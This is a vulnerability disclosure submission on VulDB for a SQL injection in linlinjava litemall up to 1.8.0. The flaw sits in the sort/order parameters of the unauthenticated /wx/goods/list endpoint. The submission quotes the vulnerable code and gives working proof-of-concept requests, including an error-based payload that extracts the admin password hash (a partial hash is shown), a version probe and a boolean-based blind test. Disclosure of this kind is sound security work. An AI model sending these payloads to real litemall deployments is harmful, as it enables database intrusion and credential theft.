إرسال #811467: linlinjava litemall up to 1.8.0 SQL Injectionالمعلومات

عنوانlinlinjava litemall up to 1.8.0 SQL Injection
الوصفA critical vulnerability was found in linlinjava litemall (https://github.com/linlinjava/litemall)up to 1.8.0. This vulnerability affects the list function of WxGoodsController.java in the front-end WeChat API. The manipulation of the argument sort/order leads to SQL injection. IMPORTANT: Unlike previously reported CVEs (CVE-2024-24323, CVE-2024-46382) which require ADMIN authentication via Shiro, this vulnerability exists in the front-end API (/wx/goods/list) which is accessible to REGULAR USERS without admin privileges. This makes it significantly more severe (CVSS 8.8 vs 7.2). Vulnerable code in WxGoodsController.java: @GetMapping("list") public Object list(@RequestParam(defaultValue="add_time") String sort, @RequestParam(defaultValue="desc") String order, ...) LitemallGoodsService.java line 121-122: if (!StringUtils.isEmpty(sort) && !StringUtils.isEmpty(order)) { example.setOrderByClause(sort + " " + order); } MyBatis: order by ${orderByClause} No @Sort whitelist annotation is applied to WxGoodsController. PoC 1 - Extract admin password hash from FRONT-END (no admin auth required): GET /wx/goods/list?sort=extractvalue(1,concat(0x7e,(SELECT password FROM litemall_admin LIMIT 1),0x7e))&order=asc&page=1&limit=10 Response error: XPATH syntax error: '~$2a$10$.rEfyBb/GURD9P2p0fRg/OAJ' Admin bcrypt hash leaked from front-end API! PoC 2 - Extract MySQL version: GET /wx/goods/list?sort=extractvalue(1,concat(0x7e,version(),0x7e))&order=asc Response error: XPATH syntax error: '~8.0.45~' PoC 3 - Boolean-based blind: GET /wx/goods/list?sort=IF(1=1,id,name)&order=asc -> sorted by id GET /wx/goods/list?sort=IF(1=2,id,name)&order=asc -> sorted by name Different order confirms injection. Comparison: CVE-2024-24323/CVE-2024-46382 require admin Shiro session. THIS vulnerability requires only regular user auth or no auth at all. Reporter: berna ([email protected])
المصدر⚠️ https://gist.github.com/A1AAAAAAAAAA1/ab8df4181f9311cb9e7dad905e9aa512
المستخدم
 berna (UID 97558)
ارسال23/04/2026 04:38 PM (1 شهر منذ)
الاعتدال17/05/2026 11:36 AM (24 days later)
الحالةتمت الموافقة
إدخال VulDB364396 [linlinjava litemall حتى 1.8.0 Front-end WeChat API WxGoodsController.java list حقن SQL]
النقاط20

التالي نظرة عامة السابق

Want to stay up to date on a daily basis?

Enable the mail alert feature now!